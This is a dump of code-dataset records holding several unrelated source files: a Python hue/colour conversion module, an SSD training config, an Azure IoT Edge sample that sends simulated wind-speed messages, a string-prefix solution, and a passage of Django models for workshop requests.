math.isclose(red, upper, abs_tol=ACCURACY):\n c_phase = 'A00u'\n elif math.isclose(red, green, abs_tol=ACCURACY) and math.isclose(blue, lower, abs_tol=ACCURACY):\n c_phase = 'A04D'\n elif math.isclose(red, blue, abs_tol=ACCURACY) and math.isclose(green, upper, abs_tol=ACCURACY):\n c_phase = 'A08u'\n elif math.isclose(green, blue, abs_tol=ACCURACY) and math.isclose(red, lower, abs_tol=ACCURACY):\n c_phase = 'A12D'\n elif math.isclose(red, green, abs_tol=ACCURACY) and math.isclose(blue, upper, abs_tol=ACCURACY):\n c_phase = 'A16u'\n elif math.isclose(red, blue, abs_tol=ACCURACY) and math.isclose(green, lower, abs_tol=ACCURACY):\n c_phase = 'A20D'\n else:\n c_phase = None\n\n if c_phase is not None:\n return c_phase\n\n # 1本はU、1本はL なので、U と L を消せば動いているバーの長さになります\n bar_length = red + green + blue - upper - lower\n width = bar_length - lower\n\n diameter = upper - lower\n radius = diameter / 2\n\n if math.isclose(red, upper, abs_tol=ACCURACY) \\\n and not math.isclose(green, upper, abs_tol=ACCURACY) \\\n and math.isclose(blue, lower, abs_tol=ACCURACY):\n # 下から青、緑、赤。緑上昇中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 30°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C02U'\n elif width < radius:\n # +-+\n # | |\n # | | +-+ < 30°\n # | | |^| x\n # +-+ +-+ +-+ 0° <=\n # R G B\n c_phase = 'B01u'\n else:\n # +-+ < 60°\n # | | ^ x\n # | | +-+ 30° <\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'D03U'\n elif not math.isclose(red, lower, abs_tol=ACCURACY) \\\n and math.isclose(green, upper, abs_tol=ACCURACY) \\\n and math.isclose(blue, lower, abs_tol=ACCURACY):\n # 下から青、赤、緑。赤下降中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # +-+ | | x == 90°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C06d'\n elif radius < width:\n # +-+ < 120°\n # v | | x\n # +-+ | | 90° <=\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'B05D'\n else:\n # +-+\n # | |\n # +-+ | | < 90°\n # |v| | | x\n # +-+ +-+ +-+ 60° <=\n # R G B\n c_phase = 'D07d'\n elif math.isclose(red, lower, abs_tol=ACCURACY) \\\n and math.isclose(green, upper, abs_tol=ACCURACY) \\\n and not math.isclose(blue, upper, abs_tol=ACCURACY):\n # 下から赤、青、緑。青上昇中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 150°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C10U'\n elif width < radius: # 半分を含まない(必要)\n # +-+\n # | |\n # | | +-+ < 150°\n # | | |^| x\n # +-+ +-+ +-+ 120° <=\n # R G B\n c_phase = 'B09u'\n else:\n # +-+ < 180°\n # | | ^ x\n # | | +-+ 150° <=\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'D11U'\n elif math.isclose(red, lower, abs_tol=ACCURACY) \\\n and not math.isclose(green, lower, abs_tol=ACCURACY) \\\n and math.isclose(blue, upper, abs_tol=ACCURACY):\n # 緑下降中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 210°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C14d'\n elif radius < width:\n # +-+ < 180°\n # v | | x\n # +-+ | | 210° <\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'B13D'\n else:\n # +-+\n # | |\n # +-+ | | < 210°\n # |v| | | x\n # +-+ +-+ +-+ 240° <\n # R G B\n c_phase = 'D15d'\n elif not math.isclose(red, upper, abs_tol=ACCURACY) \\\n and math.isclose(green, lower, abs_tol=ACCURACY) \\\n and math.isclose(blue, upper, abs_tol=ACCURACY):\n # 赤上昇中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # +-+ | | x == 270°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C18U'\n elif width < radius:\n # +-+\n # | |\n # +-+ | | < 270°\n # |^| | | x\n # +-+ +-+ +-+ 240° <=\n # R G B\n c_phase = 'B17u'\n else:\n # +-+ < 300°\n # ^ | | x\n # +-+ | | 270° <\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'D19U'\n elif math.isclose(red, upper, abs_tol=ACCURACY) \\\n and math.isclose(green, lower, abs_tol=ACCURACY) \\\n and not math.isclose(blue, lower, abs_tol=ACCURACY):\n # 青下降中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 330°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C22d'\n elif radius < width:\n # +-+ 300° <\n # | | v x\n # | | +-+ < 330°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'B21D'\n else:\n # +-+\n # | |\n # | | +-+ 330° <\n # | | |v| x\n # +-+ +-+ +-+ < 360°\n # R G B\n c_phase = 'D23d'\n else:\n raise Exception(\n f\"ERROR | Logic error. color=({red}, {green}, {blue})\")\n\n return c_phase\n\n\ndef to_color(bar_rate, theta):\n \"\"\"\n bar_rate : [float, float, float]\n 合計 1.0 となる 0.0~1.0 の値が3つ。\n 左の箱から1、2、3番目の順\n theta : float\n ラジアンで 0 を 12時の方向(赤)とし、\n 時計回りに黄色、緑、青緑……、と進んでいきます\n \"\"\"\n\n # 円周上の3点のx位置\n r_x = math.cos(theta)\n g_x = math.cos(theta-math.radians(120))\n b_x = math.cos(theta+math.radians(120))\n\n # -1.0 ~ 1.0 を使いやすいように 0.0 ~ 1.0 に変換\n rrx = (r_x + 1.0) / 2\n ggx = (g_x + 1.0) / 2\n bbx = (b_x + 1.0) / 2\n\n right_end = max(rrx, ggx, bbx)\n left_end = min(rrx, ggx, bbx)\n diff = right_end - left_end\n\n rrrx = __one_fit(rrx, left_end, diff)\n gggx = __one_fit(ggx, left_end, diff)\n bbbx = __one_fit(bbx, left_end, diff)\n\n return (\n rrrx * bar_rate[1] + bar_rate[0],\n gggx * bar_rate[1] + bar_rate[0],\n bbbx * bar_rate[1] + bar_rate[0])\n\n\ndef __one_fit(rate, left_end, diff):\n \"\"\"フィットさせます\"\"\"\n if diff == 0:\n return 0.0 # 0除算が起こるなら(仕方が無いので)差分は 0 にします\n return (rate-left_end) / diff\n\n\n# Example:\n#\n#color = (0.7, 0.4, 0.2)\n#hue_angle, _ = to_hue_angle(color)\n#print(f\"hue_angle = {hue_angle}°\")\n# # hue_angle = 23°\n#\n# color = to_color([0.2, 0.5, 0.3], math.radians(23))\n# print(f\"color = {color}\")\n# # color = (0.7, 0.39683272553278354, 0.2)\n#\n# color = hul_to_color(23, 0.7, 0.2)\n# print(f\"color = {color}\")\n# # color = (0.7, 0.3968327255327835, 0.2)\n","sub_path":"c_step28/color_hul_model.py","file_name":"color_hul_model.py","file_ext":"py","file_size_in_byte":20418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"263053796","text":"class Config():\n def __init__(self):\n self.dataset_name = 'SED-dataset'\n self.image_dir = '/home/docker_sharing_folder/sed-datasets/SHWD/VOC2028/JPEGImages'\n self.dataset_dir = '/home/docker_sharing_folder/sed-datasets'\n self.coco_api = '/home/docker_sharing_folder/cocoapi/PythonAPI'\n self.label_set = ['head', 'helmet']\n self.input_shape = [300, 300]\n self.num_examples = -1\n self.batch_size = 16\n self.SSD300 = {'ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]],\n 'scales': [0.1, 0.2, 0.375, 0.55, 0.725, 0.9, 1.075],\n 'fm_sizes': [38, 19, 10, 5, 3, 1],\n 'image_size': 300}\n self.SSD512 = {'ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2], [2]],\n 'scales': [0.07, 0.15, 0.3, 0.45, 0.6, 0.75, 0.9, 1.05],\n 'fm_sizes': [64, 32, 16, 8, 6, 4, 1],\n 'image_size': 512}\n self.arch='ssd300'\n self.neg_ratio = 3\n self.initial_lr = 1e-3\n self.momentum = 0.9\n self.weight_decay = 5e-4\n self.num_epochs = 300\n self.checkpoint_dir = 'checkpoints'\n self.pretrained_type = 'base'\n self.gpu_id = \"0\"\n","sub_path":"configs/train_config.py","file_name":"train_config.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"8393863","text":"# Work in progress to establish baseline infrastructure and plumbing for python edge modules\r\n# Needs extreme cleanup\r\n\r\nimport random\r\nimport time\r\nimport sys\r\nimport os\r\nimport datetime\r\nimport iothub_client\r\nfrom iothub_client import IoTHubClient, IoTHubClientError, IoTHubTransportProvider, IoTHubClientResult\r\nfrom iothub_client import IoTHubMessage, IoTHubMessageDispositionResult, IoTHubError, DeviceMethodReturnValue\r\n\r\n# choose HTTP, AMQP or MQTT as transport protocol\r\nPROTOCOL = IoTHubTransportProvider.MQTT\r\nMESSAGE_TIMEOUT = 10000\r\nAVG_WIND_SPEED = 10.0\r\nMSG_TXT = \"{\\\"deviceId\\\": \\\"MyFirstPythonDevice\\\",\\\"windSpeed\\\": %.2f}\"\r\n\r\ndef iothub_client_init(connStr):\r\n\r\n # prepare iothub client\r\n client = IoTHubClient(connStr, PROTOCOL)\r\n\r\n # set the time until a message times out\r\n client.set_option(\"messageTimeout\", MESSAGE_TIMEOUT)\r\n \r\n CERT_FILE = os.environ['EdgeModuleCACertificateFile'] \r\n print(\"Adding TrustedCerts from: {0}\".format(CERT_FILE))\r\n \r\n # this brings in x509 privateKey and certificate\r\n file = open(CERT_FILE)\r\n try:\r\n client.set_option(\"TrustedCerts\", file.read())\r\n print(\"Added cert\")\r\n except IoTHubClientError as iothub_client_error:\r\n print('Setting IoT Edge TrustedCerts failed (%s)' % iothub_client_error)\r\n \r\n file.close()\r\n\r\n return client\r\n\r\ndef send_confirmation_callback(message, result, user_context):\r\n\r\n map_properties = message.properties()\r\n print ( \" message_id: %s\" % message.message_id )\r\n print ( \" correlation_id: %s\" % message.correlation_id )\r\n\r\n key_value_pair = map_properties.get_internals()\r\n print ( \" Properties: %s\" % key_value_pair )\r\n\r\n\r\ndef init(connStr):\r\n\r\n try:\r\n client = iothub_client_init(connStr)\r\n\r\n while True:\r\n\r\n msg_txt_formatted = MSG_TXT % (\r\n AVG_WIND_SPEED + (random.random() * 4 + 2))\r\n\r\n # messages can be encoded as string or bytearray\r\n message = IoTHubMessage(msg_txt_formatted)\r\n client.send_event_async(\"temperatureOutput\", message, send_confirmation_callback, None)\r\n\r\n # Wait for Commands or exit\r\n print ( \"IoTHubClient waiting for commands, press Ctrl-C to exit\" )\r\n\r\n status = client.get_send_status()\r\n print ( \"Send status: %s\" % status )\r\n time.sleep(10)\r\n\r\n except IoTHubError as iothub_error:\r\n print ( \"Unexpected error %s from IoTHub\" % iothub_error )\r\n return\r\n\r\n except KeyboardInterrupt:\r\n print ( \"IoTHubClient sample stopped\" )\r\n\r\nif __name__ == '__main__':\r\n\r\n print ( \"\\nPython %s\" % sys.version )\r\n\r\n try:\r\n CONNECTION_STRING = os.environ['EdgeHubConnectionString']\r\n print(CONNECTION_STRING)\r\n\r\n except Exception as option_error:\r\n\r\n print ( option_error )\r\n sys.exit(1)\r\n\r\n print ( \"Starting the IoT Hub Python sample...\" )\r\n print ( \" Connection string=%s\" % CONNECTION_STRING )\r\n\r\n init(CONNECTION_STRING)","sub_path":"modules/PythonModule/HelloEdge.py","file_name":"HelloEdge.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"387328740","text":"class Solution:\n def longestCommonPrefix(self, strs):\n if not strs: return \"\"\n c = 0\n for i in range(len(strs[0])):\n try:\n tmp = [x[i] for x in strs]\n except IndexError:\n break \n if len(set(tmp)) == 1:\n c += 1\n else: \n break\n return strs[0][:c]","sub_path":"array_and_string/longest_common_prefix_method2.py","file_name":"longest_common_prefix_method2.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"654134726","text":"import datetime\n\nfrom django.db import models, transaction\nfrom django.urls import reverse\nfrom django_countries.fields import CountryField\n\nfrom workshops.mixins import (\n AssignmentMixin,\n CreatedUpdatedMixin,\n COCAgreementMixin,\n DataPrivacyAgreementMixin,\n EventLinkMixin,\n HostResponsibilitiesMixin,\n StateMixin,\n InstructorAvailabilityMixin,\n)\nfrom workshops.models import (\n STR_MED,\n STR_LONG,\n STR_LONGEST,\n Language,\n KnowledgeDomain,\n AcademicLevel,\n ComputingExperienceLevel,\n Curriculum,\n InfoSource,\n CommonRequest,\n)\n\n\nclass DataAnalysisLevel(models.Model):\n # ComputingExperienceLevel's sibling\n name = models.CharField(max_length=STR_LONGEST, null=False, blank=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dataanalysislevel\"\n\n\nclass DCWorkshopTopic(models.Model):\n \"\"\"Single lesson topic used in a workshop.\"\"\"\n\n name = models.CharField(max_length=STR_LONGEST, null=False, blank=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dcworkshoptopic\"\n\n\nclass DCWorkshopDomain(models.Model):\n \"\"\"Single domain used in a workshop (it corresponds to a set of lessons\n Data Carpentry prepared).\"\"\"\n\n name = models.CharField(max_length=STR_LONGEST, null=False, blank=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dcworkshopdomain\"\n\n\nclass DataVariant(models.Model):\n name = models.CharField(\n max_length=300,\n null=False,\n blank=False,\n default=\"\",\n unique=True,\n verbose_name=\"Name\",\n help_text=\"Data variant name and description\",\n )\n unknown = models.BooleanField(\n null=False,\n blank=True,\n default=False,\n verbose_name=\"Unknown entry\",\n help_text=\"Mark this record as 'I don't know yet', or \"\n \"'Unknown', or 'Not sure yet'. There can be only one such \"\n \"record in the database.\",\n )\n\n class Meta:\n verbose_name = \"Data variant\"\n verbose_name_plural = \"Data variants\"\n ordering = [\n \"id\",\n ]\n\n def __str__(self):\n return self.name\n\n @transaction.atomic\n def save(self, *args, **kwargs):\n \"\"\"When saving with `unknown=True`, update all other records with this\n parameter to `unknown=False`. This helps keeping only one record with\n `unknown=True` in the database - a specific case of uniqueness.\"\"\"\n\n # wrapped in transaction in order to prevent from updating records to\n # `unknown=False` when saving fails\n if self.unknown:\n DataVariant.objects.filter(unknown=True).update(unknown=False)\n return super().save(*args, **kwargs)\n\n\nclass EventRequest(\n AssignmentMixin, StateMixin, CreatedUpdatedMixin, EventLinkMixin, models.Model\n):\n name = models.CharField(max_length=STR_MED)\n email = models.EmailField()\n affiliation = models.CharField(\n max_length=STR_LONG, help_text=\"University or Company\"\n )\n location = models.CharField(\n max_length=STR_LONG, help_text=\"City, Province, or State\"\n )\n country = CountryField()\n conference = models.CharField(\n max_length=STR_LONG,\n verbose_name=\"If the workshop is to be associated with a conference \"\n \"or meeting, which one? \",\n blank=True,\n default=\"\",\n )\n preferred_date = models.CharField(\n max_length=STR_LONGEST,\n help_text=\"Please indicate when you would like to run the workshop. \"\n \"A range of at least a month is most helpful, although if \"\n \"you have specific dates you need the workshop, we will try \"\n \"to accommodate those requests.\",\n verbose_name=\"Preferred workshop dates\",\n )\n language = models.ForeignKey(\n Language,\n verbose_name=\"What human language do you want the workshop to be run\" \" in?\",\n null=True,\n on_delete=models.SET_NULL,\n )\n\n WORKSHOP_TYPE_CHOICES = (\n (\"swc\", \"Software-Carpentry\"),\n (\"dc\", \"Data-Carpentry\"),\n )\n workshop_type = models.CharField(\n max_length=STR_MED, choices=WORKSHOP_TYPE_CHOICES, blank=False, default=\"swc\",\n )\n\n ATTENDEES_NUMBER_CHOICES = (\n (\"1-20\", \"1-20 (one room, two instructors)\"),\n (\"20-40\", \"20-40 (one room, two instructors)\"),\n (\"40-80\", \"40-80 (two rooms, four instructors)\"),\n (\"80-120\", \"80-120 (three rooms, six instructors)\"),\n )\n approx_attendees = models.CharField(\n max_length=STR_MED,\n choices=ATTENDEES_NUMBER_CHOICES,\n help_text=\"This number doesn't need to be precise, but will help us \"\n \"decide how many instructors your workshop will need.\"\n \"Each workshop must have at least two instructors.\",\n verbose_name=\"Approximate number of Attendees\",\n blank=False,\n default=\"20-40\",\n )\n\n attendee_domains = models.ManyToManyField(\n KnowledgeDomain,\n help_text=\"The attendees' academic field(s) of study, if known.\",\n verbose_name=\"Domains or topic of interest for target audience\",\n blank=False,\n )\n attendee_domains_other = models.CharField(\n max_length=STR_LONG,\n help_text=\"If none of the fields above works for you.\",\n verbose_name=\"Other domains or topics of interest\",\n blank=True,\n default=\"\",\n )\n DATA_TYPES_CHOICES = (\n (\"survey\", \"Survey data (ecology, biodiversity, social science)\"),\n (\"genomic\", \"Genomic data\"),\n (\"geospatial\", \"Geospatial data\"),\n (\"text-mining\", \"Text mining\"),\n (\"\", \"Other:\"),\n )\n data_types = models.CharField(\n max_length=STR_MED,\n choices=DATA_TYPES_CHOICES,\n verbose_name=\"We currently have developed or are developing workshops\"\n \" focused on four types of data. Please let us know which\"\n \" workshop would best suit your needs.\",\n blank=True,\n )\n data_types_other = models.CharField(\n max_length=STR_LONG,\n verbose_name=\"Other data domains for the workshop\",\n blank=True,\n )\n attendee_academic_levels = models.ManyToManyField(\n \"workshops.AcademicLevel\",\n help_text=\"If you know the academic level(s) of your attendees, \"\n \"indicate them here.\",\n verbose_name=\"Attendees' Academic Level\",\n )\n attendee_computing_levels = models.ManyToManyField(\n \"workshops.ComputingExperienceLevel\",\n help_text=\"Indicate the attendees' level of computing experience, if \"\n \"known. We will ask attendees to fill in a skills survey \"\n \"before the workshop, so this answer can be an \"\n \"approximation.\",\n verbose_name=\"Attendees' level of computing experience\",\n )\n attendee_data_analysis_level = models.ManyToManyField(\n DataAnalysisLevel,\n help_text=\"If you know, indicate learner's general level of data \"\n \"analysis experience\",\n verbose_name=\"Level of data analysis experience\",\n )\n understand_admin_fee = models.BooleanField(\n default=False,\n # verbose_name a.k.a. label and help_text were moved to the\n # SWCEventRequestForm and DCEventRequestForm\n )\n\n ADMIN_FEE_PAYMENT_CHOICES = (\n (\"NP1\", \"Non-profit / non-partner: US$2500\"),\n (\"FP1\", \"For-profit: US$10,000\"),\n (\n \"self-organized\",\n \"Self-organized: no fee (please let us know if you \"\n \"wish to make a donation)\",\n ),\n (\"waiver\", \"Waiver requested (please give details in \" '\"Anything else\")'),\n )\n admin_fee_payment = models.CharField(\n max_length=STR_MED,\n choices=ADMIN_FEE_PAYMENT_CHOICES,\n verbose_name=\"Which of the following applies to your payment for the \"\n \"administrative fee?\",\n blank=False,\n default=\"NP1\",\n )\n fee_waiver_request = models.BooleanField(\n help_text=\"Waiver's of the administrative fee are available on \"\n \"a needs basis. If you are interested in submitting a waiver\"\n \" application please indicate here.\",\n verbose_name=\"I would like to submit an administrative fee waiver \"\n \"application\",\n default=False,\n )\n cover_travel_accomodation = models.BooleanField(\n default=False,\n verbose_name=\"My institution will cover instructors' travel and \"\n \"accommodation costs.\",\n )\n TRAVEL_REIMBURSEMENT_CHOICES = (\n (\"\", \"Don't know yet.\"),\n (\"book\", \"Book travel through our university or program.\"),\n (\"reimburse\", \"Book their own travel and be reimbursed.\"),\n (\"\", \"Other:\"),\n )\n travel_reimbursement = models.CharField(\n max_length=STR_MED,\n verbose_name=\"How will instructors' travel and accommodations be \" \"managed?\",\n choices=TRAVEL_REIMBURSEMENT_CHOICES,\n blank=True,\n default=\"\",\n )\n travel_reimbursement_other = models.CharField(\n max_length=STR_LONG,\n verbose_name=\"Other propositions for managing instructors' travel and\"\n \" accommodations\",\n blank=True,\n )\n comment = models.TextField(\n help_text=\"What else do you want us to know about your workshop? About\"\n \" your attendees? About you?\",\n verbose_name=\"Anything else?\",\n blank=True,\n )\n\n def get_absolute_url(self):\n return reverse(\"eventrequest_details\", args=[self.pk])\n\n def __str__(self):\n return \"{name} (from {affiliation}, {type} workshop)\".format(\n name=self.name, affiliation=self.affiliation, type=self.workshop_type,\n )\n\n class Meta:\n ordering = [\"created_at\"]\n\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_eventrequest\"\n\n\nclass EventSubmission(\n AssignmentMixin, StateMixin, CreatedUpdatedMixin, EventLinkMixin, models.Model\n):\n url = models.URLField(\n null=False, blank=False, verbose_name=\"Link to the workshop's website\"\n )\n contact_name = models.CharField(\n null=False, blank=False, max_length=STR_LONG, verbose_name=\"Your name\"\n )\n contact_email = models.EmailField(\n null=False,\n blank=False,\n verbose_name=\"Your email\",\n help_text=\"We may need to contact you regarding workshop details.\",\n )\n self_organized = models.BooleanField(\n null=False, default=False, verbose_name=\"Was the workshop self-organized?\"\n )\n notes = models.TextField(null=False, blank=True, default=\"\")\n\n def __str__(self):\n return \"Event submission <{}>\".format(self.url)\n\n def get_absolute_url(self):\n return reverse(\"eventsubmission_details\", args=[self.pk])\n\n class Meta:\n ordering = [\"created_at\"]\n\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_eventsubmission\"\n\n\nclass DCSelfOrganizedEventRequest(\n AssignmentMixin, StateMixin, CreatedUpdatedMixin, EventLinkMixin, models.Model\n):\n \"\"\"Should someone want to run a self-organized Data Carpentry event, they\n have to fill this specific form first. See\n https://github.com/swcarpentry/amy/issues/761\"\"\"\n\n name = models.CharField(max_length=STR_LONGEST,)\n email = models.EmailField()\n organization = models.CharField(\n max_length=STR_LONGEST, verbose_name=\"University or organization affiliation\",\n )\n INSTRUCTOR_CHOICES = [\n (\"\", \"None\"),\n (\n \"incomplete\",\n \"Have gone through instructor training, but haven't \"\n \"yet completed checkout\",\n ),\n (\"dc\", \"Certified Data Carpentry instructor\"),\n (\"swc\", \"Certified Software Carpentry instructor\"),\n (\"both\", \"Certified Software and Data Carpentry instructor\"),\n ]\n instructor_status = models.CharField(\n max_length=STR_MED,\n choices=INSTRUCTOR_CHOICES,\n verbose_name=\"Your Software and Data Carpentry instructor status\",\n blank=True,\n )\n PARTNER_CHOICES = [\n (\"y\", \"Yes\"),\n (\"n\", \"No\"),\n (\"u\", \"Unsure\"),\n (\"\", \"Other (enter below)\"),\n ]\n is_partner = models.CharField(\n max_length=1,\n choices=PARTNER_CHOICES,\n blank=True,\n verbose_name=\"Is your organization a Data Carpentry or Software \"\n \"Carpentry Partner\",\n )\n is_partner_other = models.CharField(\n max_length=STR_LONG,\n default=\"\",\n blank=True,\n verbose_name=\"Other (is your organization a Partner?)\",\n )\n location = models.CharField(\n max_length=STR_LONGEST,\n verbose_name=\"Location\",\n help_text=\"City, Province or State\",\n )\n country = CountryField()\n associated_conference = models.CharField(\n max_length=STR_LONG,\n default=\"\",\n blank=True,\n verbose_name=\"Associated conference\",\n help_text=\"If the workshop is to be associated with a conference or \"\n \"meeting, which one?\",\n )\n dates = models.CharField(\n max_length=STR_LONGEST,\n verbose_name=\"Planned workshop dates\",\n help_text=\"Preferably in YYYY-MM-DD to YYYY-MM-DD format\",\n )\n\n # workshop domain(s)\n domains = models.ManyToManyField(\n DCWorkshopDomain,\n blank=False,\n verbose_name=\"Domain for the workshop\",\n help_text=\"Set of lessons you're going to teach\",\n )\n domains_other = models.CharField(\n max_length=STR_LONGEST,\n blank=True,\n default=\"\",\n verbose_name=\"Other domains for the workshop\",\n help_text=\"If none of the fields above works for you.\",\n )\n\n # Lesson topics to be taught during the workshop\n topics = models.ManyToManyField(\n DCWorkshopTopic,\n blank=False,\n verbose_name=\"Topics to be taught\",\n help_text=\"A Data Carpentry workshop must include a Data Carpentry \"\n \"lesson on data organization and three other modules in the \"\n \"same domain from the Data Carpentry curriculum (see http://www.'\n \"datacarpentry.org/workshops/). If you do want to \"\n \"include materials not in our curriculum, please note that \"\n \"below and we'll get in touch.\",\n )\n topics_other = models.CharField(\n max_length=STR_LONGEST,\n blank=True,\n default=\"\",\n verbose_name=\"Other topics to be taught\",\n help_text=\"If none of the fields above works for you.\",\n )\n\n # questions about attendees' experience levels\n attendee_academic_levels = models.ManyToManyField(\n \"workshops.AcademicLevel\",\n help_text=\"If you know the academic level(s) of your attendees, \"\n \"indicate them here.\",\n verbose_name=\"Attendees' academic level\",\n )\n attendee_data_analysis_level = models.ManyToManyField(\n DataAnalysisLevel,\n help_text=\"If you know, indicate learner's general level of data \"\n \"analysis experience\",\n verbose_name=\"Attendees' level of data analysis experience\",\n )\n\n # payments\n PAYMENT_CHOICES = [\n (\n \"per_participant\",\n \"I will contribute $25/participant through \" \"registration fees\",\n ),\n (\"invoice\", \"I will contribute $500 via an invoice\"),\n (\"credit_card\", \"I will contribute $500 via a credit card payment\"),\n (\"fee_waiver\", \"I would like to request a fee waiver\"),\n ]\n payment = models.CharField(\n max_length=STR_MED,\n blank=False,\n choices=PAYMENT_CHOICES,\n default=\"per_participant\",\n verbose_name=\"Payment choice\",\n help_text=\"Self-organized workshops for non-Partner organizations are \"\n \"$500 or $25/participant for a workshop licensing fee (http://www.datacarpentry.org/self-organized-workshops/'\n \"). Fee waivers are available and generally granted upon\"\n \" request.\",\n )\n fee_waiver_reason = models.CharField(\n max_length=STR_LONGEST,\n default=\"\",\n blank=True,\n verbose_name=\"Reason for requesting a fee waiver\",\n )\n\n # confirmations\n handle_registration = models.BooleanField(\n default=False,\n blank=False,\n verbose_name=\"I confirm that I will handle registration for this\" \" workshop\",\n )\n distribute_surveys = models.BooleanField(\n default=False,\n blank=False,\n verbose_name=\"I confirm that I will distribute the Data Carpentry \"\n \"surveys to workshop participants\",\n )\n follow_code_of_conduct = models.BooleanField(\n default=False,\n blank=False,\n verbose_name=\"I confirm that I will follow the Data Carpentry Code of\"\n \" Conduct\",\n )\n\n def get_absolute_url(self):\n return reverse(\"dcselforganizedeventrequest_details\", args=[self.pk])\n\n class Meta:\n # This model was imported from Workshops application, but for\n # compatibility reasons (we don't want to rename DB table, as it\n # doesn't work in SQLite) we're keeping it under the same name in DB.\n db_table = \"workshops_dcselforganizedeventrequest\"\n\n\nclass WorkshopInquiryRequest(\n AssignmentMixin,\n StateMixin,\n CreatedUpdatedMixin,\n CommonRequest,\n DataPrivacyAgreementMixin,\n COCAgreementMixin,\n HostResponsibilitiesMixin,\n InstructorAvailabilityMixin,\n EventLinkMixin,\n models.Model,\n):\n \"\"\"\n This model is used for storing inquiry information from anyone interested\n in The Carpentries and workshops in general.\n \"\"\"\n\n UNSURE_CHOICE = (\"\", \"Not sure yet.\")\n\n location = models.CharField(\n max_length=STR_LONGEST,\n blank=False,\n null=False,\n default=\"\",\n verbose_name=\"Workshop location\",\n help_text=\"City, state, or province.\",\n )\n country = CountryField(null=False, blank=False, verbose_name=\"Country\",)\n # Here starts \"Your Audience\" part with this description:\n # The Carpentries offers several different workshops intended for audiences\n # from different domain backgrounds, with different computational\n # experience and learning goals. Your responses to the following questions\n # will help us advise you on which workshop(s) may best serve your\n # audience. All questions are optional so please share as much as you can.\n routine_data = models.ManyToManyField(\n DataVariant,\n blank=True,\n verbose_name=\"What kinds of data does your target audience routinely \"\n \"work with?\",\n help_text=\"Check all that apply.\",\n )\n routine_data_other = models.CharField(\n max_length=STR_LONGEST,\n blank=True,\n default=\"\",\n verbose_name=\"Other kinds of routinely worked-with data\",\n )\n domains = models.ManyToManyField(\n KnowledgeDomain,\n blank=True,\n verbose_name=\"Domains or topic of interest for target audience\",\n help_text=\"The attendees' academic field(s) of study, if known. Check \"\n \"all that apply.\",\n )\n domains_other = models.CharField(\n max_length=STR_LONGEST, blank=True, default=\"\", verbose_name=\"Other domains\",\n )\n academic_levels = models.ManyToManyField(\n AcademicLevel,\n blank=True,\n verbose_name=\"Attendees' academic level / career stage\",\n help_text=\"If you know the academic level(s) of your attendees, \"\n \"indicate them here. Check all that apply.\",\n )\n computing_levels = models.ManyToManyField(\n ComputingExperienceLevel,\n blank=True,\n verbose_name=\"Attendees' level of computing experience\",\n help_text=\"Indicate the attendees' level of computing experience, if \"\n \"known. We will ask attendees to fill in a skills survey \"\n \"before the workshop, so this answer can be an \"\n \"approximation. Check all that apply.\",\n )\n audience_description = models.TextField(\n blank=True,\n verbose_name=\"Please describe your anticipated audience, including \"\n \"their experience, background, and goals\",\n )\n SWC_LESSONS_LINK = (\n ''\n \"Software Carpentry lessons page\"\n )\n DC_LESSONS_LINK = (\n ''\n \"Data Carpentry lessons page\"\n )\n LC_LESSONS_LINK = (\n ''\n \"Library Carpentry lessons page\"\n )\n requested_workshop_types = models.ManyToManyField(\n Curriculum,\n limit_choices_to={\"active\": True},\n blank=True,\n verbose_name=\"Which Carpentries workshop are you requesting?\",\n help_text=\"If your learners are new to programming and primarily \"\n \"interested in working with data, Data Carpentry is likely \"\n \"the best choice. If your learners are interested in \"\n \"learning more about programming, including version control\"\n \" and automation, Software Carpentry is likely the best \"\n \"match. If your learners are people working in library and \"\n \"information related roles interested in learning data and \"\n \"software skills, Library Carpentry is the best choice. 